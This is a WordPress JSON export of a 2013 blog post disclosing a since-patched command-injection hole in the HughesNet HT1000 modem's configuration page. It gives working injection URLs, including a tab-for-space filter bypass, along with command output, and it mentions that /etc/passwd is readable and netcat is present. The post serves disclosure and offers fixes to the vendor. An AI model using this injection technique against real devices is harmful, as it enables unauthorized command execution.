{"id":193,"date":"2013-08-23T10:11:02","date_gmt":"2013-08-23T18:11:02","guid":{"rendered":"http:\/\/jacksontech.net\/?p=193"},"modified":"2014-07-10T13:30:44","modified_gmt":"2014-07-10T21:30:44","slug":"ht1000-url-parsing-vulnerability","status":"publish","type":"post","link":"https:\/\/jacksontech.net\/index.php\/2013\/08\/ht1000-url-parsing-vulnerability\/","title":{"rendered":"HT1000 URL Parsing Vulnerability (now fixed!)"},"content":{"rendered":"

Disclaimer: This issue has recently (September-ish) been fixed by HughesNet (thank you!) in a firmware update to the HT1000 modem. I am reposting the old article for historical purposes.
\n<\/em><\/p>\n

The HT1000 modem has a configuration\/status webpage called the “System Control Center” (SCC) at the IP address 192.168.0.1. Certain malformed URL within the SCC will cause an arbitrary command to be executed on the modem as an unprivileged user.<\/p>\n

This security hole is related to the command to enable and disable Web Acceleration.<\/p>\n

<\/p>\n

To disable WAC, the following URL is called:<\/p>\n

http:\/\/192.168.0.1\/cgi-bin\/command.cgi?Command=314&disableWAC=on<\/pre>\n
To enable WAC, this URL is called:<\/p>\n
http:\/\/192.168.0.1\/cgi-bin\/command.cgi?Command=314<\/pre>\n
However, it appears that arbitrary commands can be executed through this URL. Inserting a semicolon and then an arbitrary command results in that command being executed, with the output being piped back to the web browser. For example, visiting the following URL results in some unexpected output:<\/p>\n
http:\/\/192.168.0.1\/cgi-bin\/command.cgi?Command=314&;ls<\/pre>\n
Command cannot be executed. URI: \/wac_userdisable query: command.cgi\r\nindex.cgi\r\ninstall.cgi\r\npktdump.cgi\r\nreg.cgi\r\nstatscmd.cgi\r\ntestcmd.cgi\r\nwitcmd.cgi<\/pre>\n
This is the output of the Linux command ls<\/em>. pktdump.cgi is of particular interest…<\/p>\n
Although spaces are filtered out by the web server (throwing a 501 Not Implemented page), tabs are not. As such, longer commands can be crafted.<\/p>\n
http:\/\/192.168.0.1\/cgi-bin\/command.cgi?Command=314&;ps%09-w<\/pre>\n
Command cannot be executed. URI: \/wac_userdisable query:   PID USER       VSZ STAT COMMAND\r\n    1 root      1812 S    init  \r\n    2 root         0 SW<  [kthreadd]\r\n    3 root         0 SW<  [ksoftirqd\/0]\r\n    4 root         0 SW<  [events\/0]\r\n    5 root         0 SW<  [khelper]\r\n    6 root         0 SW<  [kblockd\/0]\r\n    7 root         0 SW<  [kseriod]\r\n    8 root         0 SW   [pdflush]\r\n    9 root         0 SW   [pdflush]\r\n   10 root         0 SW<  [kswapd0]\r\n   11 root         0 SW<  [aio\/0]\r\n   12 root         0 SW<  [nfsiod]\r\n   21 root         0 SW<  [mtdblockd]\r\n   22 root         0 SW<  [rpciod\/0]\r\n   29 root      2260 S    klogd -c 4 \r\n   55 root      3016 S    \/bin\/sh \/etc\/restartMon.sh \r\n   68 root         0 SW<  [loop0]\r\n   80 root         0 SWN  [jffs2_gcd_mtd4]\r\n  148 root         0 SW   [dlpktproc_Data]\r\n  149 root         0 SW   [dlpktproc_Monit]\r\n  155 root         0 SW   [kpep]\r\n  319 root     30728 S    \/fl0\/apps\/logrt \r\n  321 root     11280 S    .\/sysmon \r\n  324 root      3080 S    \/sbin\/getty console \r\n  325 root      1984 S    \/sbin\/syslogd \r\n  329 root     19392 S    cfm 0 \r\n  331 root     11608 S    tfw 1 \r\n  334 root     17136 S    cac 2 \r\n  335 root     31856 S    amu 3 \r\n  336 root     11436 S    ledif 4 \r\n  337 root     29448 S    tmu 5 \r\n  338 root     41128 S    downlink 6 \r\n  343 root     49556 S    uplink 7 \r\n  344 root     18684 S    sdlmgr 8 \r\n  351 root     28396 S    assoc 9 \r\n  364 root     63292 S    diagmgr 10 \r\n  365 root     27100 S    sysinfo 11 \r\n  367 root     28388 S    sbc 12 \r\n  368 root     20008 S    evtmgr 13 \r\n  370 root     17220 S    ddnsc 14 \r\n  371 root     17276 S    vptMgr 15 \r\n  373 root     11544 S    dnsWrapper 16 \r\n  375 root     11148 S    odumonitor 18 \r\n  441 daemon    5136 S    HttpServer -d -4 -c \/etc\/httpd.conf \r\n  448 root     36012 S    web15 \r\n  453 root      3608 S    Ntpd -g -c \/etc\/ntp.conf -p \/var\/run\/ntpd.pid \r\n  520 root      4692 S    \/usr\/sbin\/sshd -h \/fl0\/ssh\/ssh_host_key -h \/fl0\/ssh\/ssh_host_rsa_key -h \/fl0\/ssh\/ssh_host_dsa_key \r\n  537 root     10888 S    Dhcpv4Server -4 -cf \/etc\/dhcpd_v4.conf -lf \/var\/dhcp\/dhcpd_v4.leases -pf \/var\/run\/dhcpd_v4.pid eth0 \r\n  539 root     33524 S    Dhcpv6Server -6 -cf \/etc\/dhcpd_v6.conf -lf \/var\/dhcp\/dhcpd_v6.leases -pf \/var\/run\/dhcpd_v6.pid eth0 \r\n  541 root     21908 S    snmpd -f -p \/var\/run\/snmpd.pid -c \/etc\/snmpd.conf \r\n  543 root      1960 S    radvd \r\n  546 nobody   12096 S    dnsmasq -x \/var\/run\/dnsmasq.pid -q -Q 8054 -p 10054 \r\n 4137 root      2884 S    sleep 5 \r\n 4138 daemon    5272 S    HttpServer -d -4 -c \/etc\/httpd.conf \r\n 4139 root     30068 S    command.cgi \r\n 4140 daemon    3016 S    sh -c wget -O - -q http:\/\/localhost:8088\/wac_userdisable?;ps -w \r\n 4143 daemon    3192 R    ps -w<\/pre>\n
The sh command line visible above suggests that at least a portion of the URL is being piped directly to sh<\/em>!<\/p>\n
Unfortunately, the filesystem permissions on the modem are not very robust. \/etc\/passwd is not protected at all and can be accessed in this same way. Furthermore, netcat<\/em> is available on the modem, which makes it very trivial to set up an unprivileged shell, but that is far beyond the scope of this post.<\/p>\n
I hope this is enough information for HughesNet to pinpoint the URL handling bug and squash it flat.<\/p>\n
To HughesNet employees, here are my suggestions for fixing it:<\/p>\n
I see two quick ‘n dirty options.<\/p>\n
1) Mod the webserver (nhttpd?) to filter out tabs as well as spaces in URLs, and\/or make it scream if it sees a semicolon or other special shell characters.<\/p>\n
2) Mod the .cgi app that calls the little app hanging around at localhost:8088 to similarly scream at special bash characters like semicolons.<\/p>\n
For best security, do both. If you do #2 but not #1, another engineer may write a similar piece of code and introduce a new vulnerability.<\/p>\n
Note: Hughes Net pushed out software version 2.2.0.9, which closed this hole on the HT1000. The HT1100 modem, which sports a newer firmware reversion when shipped, never had this vulnerability. It appears the hole was closed by modifying the onboard webserver to prevent nasty input from even reaching the underlying bash script.<\/em><\/p>\n","protected":false},"excerpt":{"rendered":"
Disclaimer: This issue has recently (September-ish) been fixed by HughesNet (thank you!) in a firmware update to the HT1000 modem. I am reposting the old article for historical purposes. The HT1000 modem has a configuration\/status webpage called the “System Control Center” (SCC) at the IP address 192.168.0.1. Certain malformed URL within the SCC will cause … more<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2,5,3,4],"tags":[7,8,6],"class_list":["post-193","post","type-post","status-publish","format-standard","hentry","category-comptech","category-linux","category-networking","category-security","tag-ht1000","tag-hughesnet","tag-satellite"],"_links":{"self":[{"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/posts\/193","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/comments?post=193"}],"version-history":[{"count":13,"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/posts\/193\/revisions"}],"predecessor-version":[{"id":392,"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/posts\/193\/revisions\/392"}],"wp:attachment":[{"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/media?parent=193"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/categories?post=193"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jacksontech.net\/index.php\/wp-json\/wp\/v2\/tags?post=193"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}